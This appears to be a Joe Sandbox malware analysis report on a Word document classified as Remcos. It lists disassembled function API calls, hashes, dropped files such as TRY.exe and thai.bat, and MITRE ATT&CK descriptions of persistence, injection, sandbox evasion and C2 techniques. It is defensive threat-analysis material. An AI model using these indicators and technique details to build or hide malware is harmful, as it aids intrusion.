API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: da4bc00c7ae1d23eecce1492ef476764353cfb85bcf844c9ad0217d8cc464016
Instruction ID: 53f4f323a598cd11cd06ba425fcbb31b36a6258b04c8f1ce01c56e2665f8bc2d
Opcode Fuzzy Hash: da4bc00c7ae1d23eecce1492ef476764353cfb85bcf844c9ad0217d8cc464016
Instruction Fuzzy Hash: FB119E21E08A8681FE605B69B45D3B96370FB88BA4F541372CFAE867D5CF3CD0458608

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC439A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 233windowCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF6BAC439EB
MessageBeep.USER32 ref: 00007FF6BAC43C5F

Part of subcall function 00007FF6BAC476D8: GetVersionExA.KERNEL32 ref: 00007FF6BAC4772D
Part of subcall function 00007FF6BAC476D8: GetSystemMetrics.USER32 ref: 00007FF6BAC47761
Part of subcall function 00007FF6BAC476D8: RegOpenKeyExA.ADVAPI32 ref: 00007FF6BAC47790
Part of subcall function 00007FF6BAC476D8: RegQueryValueExA.ADVAPI32 ref: 00007FF6BAC477C5
Part of subcall function 00007FF6BAC476D8: RegCloseKey.ADVAPI32 ref: 00007FF6BAC477D2
Part of subcall function 00007FF6BAC476D8: CharNextA.USER32 ref: 00007FF6BAC4781B

MessageBoxA.USER32 ref: 00007FF6BAC43C93

Part of subcall function 00007FF6BAC47614: EnumResourceLanguagesA.KERNEL32 ref: 00007FF6BAC4766C
Part of subcall function 00007FF6BAC47614: EnumResourceLanguagesA.KERNEL32 ref: 00007FF6BAC476A4

Strings

tha, xrefs: 00007FF6BAC43C84, 00007FF6BAC43CBE

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
String ID: tha
API String ID: 2312377310-992520703
Opcode ID: c4e2bbb139771fec0025214002a9c0f5fba9f55d383aab18dc9d0e176869e49b
Instruction ID: 3bd9bbd183943bc6787668e2316b5947bf8a8ee70100e8510c487fc0def9d6f8
Opcode Fuzzy Hash: c4e2bbb139771fec0025214002a9c0f5fba9f55d383aab18dc9d0e176869e49b
Instruction Fuzzy Hash: AFA16832E1C2528AF7619F2D984867A76B4AF84754F2101BAEF1ED3394DF3DE8458708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC47110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF6BAC471BB
WriteFile.KERNEL32 ref: 00007FF6BAC471EC
CloseHandle.KERNEL32 ref: 00007FF6BAC4720B

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6BAC47142

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 1065093856-1193786559
Opcode ID: bb505d493274340a96934ae67f5122787252b17ade4607be8a2e18294568c83c
Instruction ID: 4c80fe2c148e86f71b64e74e0a4e764a08f0309d17c73d4b14100cd5626fafea
Opcode Fuzzy Hash: bb505d493274340a96934ae67f5122787252b17ade4607be8a2e18294568c83c
Instruction Fuzzy Hash: AE31A172B1868186EB218F18E8487AA6770FB497A4F540275DF5D87794DF7CD408CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC45814 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

#20.CABINET ref: 00007FF6BAC4588D
#21.CABINET ref: 00007FF6BAC458C6
#23.CABINET ref: 00007FF6BAC458FA

Strings

*MEMCAB, xrefs: 00007FF6BAC458A0

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID:
String ID: *MEMCAB
API String ID: 0-3211172518
Opcode ID: 6afdfd805b350688c3602c957db617d8632adc9201ddbe5db9da4816f6311d69
Instruction ID: cb2af4fbc2435a561da10a36824d94e29b7d66837e15319029f491c74ec1a01b
Opcode Fuzzy Hash: 6afdfd805b350688c3602c957db617d8632adc9201ddbe5db9da4816f6311d69
Instruction Fuzzy Hash: 7A31FA31A08B4A85FB508B29E48C3A933B5BF447A0F540676DE6D867A4EF3DEC45C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC47C20 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6BAC47C93
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6BAC47CB2
RtlVirtualUnwind.KERNEL32 ref: 00007FF6BAC47CFF
__raise_securityfailure.LIBCMT ref: 00007FF6BAC47DE4

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: 3705a83dead617d7ec271545f917a4e3987cacfa7ba11eb70581d06d55b83e20
Instruction ID: 0f4b91ecf917ac6a68b2acda81c9934cd7b9d5ac91988c0aba3025e25560a12a
Opcode Fuzzy Hash: 3705a83dead617d7ec271545f917a4e3987cacfa7ba11eb70581d06d55b83e20
Instruction Fuzzy Hash: 9041B035A0DB4281EB208B5CF89836A63B4FB88784F9041B6DE8D82775DF7DE459C748

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC47304 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FF6BAC4732E
LoadResource.KERNEL32 ref: 00007FF6BAC4733F
DialogBoxIndirectParamA.USER32 ref: 00007FF6BAC4736F
FreeResource.KERNEL32 ref: 00007FF6BAC4737B

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: 8af9f5df09fb230a588841b58d700163d72a1dc5bf7f8989bca99a4abbe73bfe
Instruction ID: c57fb326dfd0622cf0b177dd71718fa774887e21cb0dd3dd937bdb65e0e04979
Opcode Fuzzy Hash: 8af9f5df09fb230a588841b58d700163d72a1dc5bf7f8989bca99a4abbe73bfe
Instruction Fuzzy Hash: F9116331B08B4182EE208B1AF44826AA2B1FB59FE4F180674EF5D47BD4DF3CE4408704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC47DF8 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6BAC47E03
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6BAC47E22
RtlVirtualUnwind.KERNEL32 ref: 00007FF6BAC47E6F
__raise_securityfailure.LIBCMT ref: 00007FF6BAC47EE5

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: 04fa2115b3eb68aec4ea8641280f1283d8aa92b6bb6640a1a0ecb199eb4784e3
Instruction ID: b50d64b52687fdba4219f189abc6023fff589aadec9b33d25f817192bdd973c2
Opcode Fuzzy Hash: 04fa2115b3eb68aec4ea8641280f1283d8aa92b6bb6640a1a0ecb199eb4784e3
Instruction Fuzzy Hash: D921AD35A0CB4686E7108B48E8883AA73B4FB88B94F6001B6DB8D82775DF7DE455C748

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC4745C Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

CharPrevA.USER32(?,?,00000000,00007FF6BAC428CD), ref: 00007FF6BAC47480
CharPrevA.USER32(?,?,00000000,00007FF6BAC428CD), ref: 00007FF6BAC47496
CharPrevA.USER32(?,?,00000000,00007FF6BAC428CD), ref: 00007FF6BAC474B4
CharNextA.USER32(?,?,00000000,00007FF6BAC428CD), ref: 00007FF6BAC474C2

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 8f04076bf7384626d75a864c6dfc3af67e08eec1412e220a3fe757313dad08a7
Instruction ID: b7e4af2d3153072257dd8ee43e0a65af5f8c643e44c6229a4f194d1bb960521e
Opcode Fuzzy Hash: 8f04076bf7384626d75a864c6dfc3af67e08eec1412e220a3fe757313dad08a7
Instruction Fuzzy Hash: 3301F952E0C69140FF114B69A94823D6EA19B49FF0F2853B0DF6E877C4CF1C98818B05

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6BAC43908 Relevance: 6.0, APIs: 4, Instructions: 39windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32 ref: 00007FF6BAC4392C
PeekMessageA.USER32 ref: 00007FF6BAC4394B
DispatchMessageA.USER32 ref: 00007FF6BAC43968
PeekMessageA.USER32 ref: 00007FF6BAC43983

Memory Dump Source

Source File: 0000000C.00000002.503223274.00007FF6BAC41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6BAC40000, based on PE: true

Associated: 0000000C.00000002.503215382.00007FF6BAC40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503244002.00007FF6BAC4C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.503251646.00007FF6BAC4E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6bac40000_TRY.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 3aee720f3c8c46dcd25b27dd5854f200cc9db310b4e25a0c757932c117ee5bc3
Instruction ID: 6dd9cd2a237443001229e8a5dae7b9a345d99d1f02949c009b5a0ec12e504f91
Opcode Fuzzy Hash: 3aee720f3c8c46dcd25b27dd5854f200cc9db310b4e25a0c757932c117ee5bc3
Instruction Fuzzy Hash: 4B016D32A2C64287FBA08F28E488B7A66B0FFE4754F505174DB4A82994DF7CD548CB04

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 12543_0008858249_FWDOUTSTANDING_20200604.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Remcos

Yara Signatures

Initial Sample

Dropped Files

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\54841c.rbs

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\931CA4E3-9003-4E2D-AC60-8F56ED9BC214

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{1A0CB39D-07E3-4E62-8803-0A309F2608CA}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe

C:\Users\user\AppData\Local\Temp\IXP000.TMP\thai.bat

C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files.cab

C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe (copy)

C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\fd1981f4a71244758e929e11db0d4f1d$dpx$.tmp\bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp

C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\msiwrapper.ini

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_au1v2jy0.qdl.ps1

Windows Analysis Report
12543_0008858249_FWDOUTSTANDING_20200604.doc

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre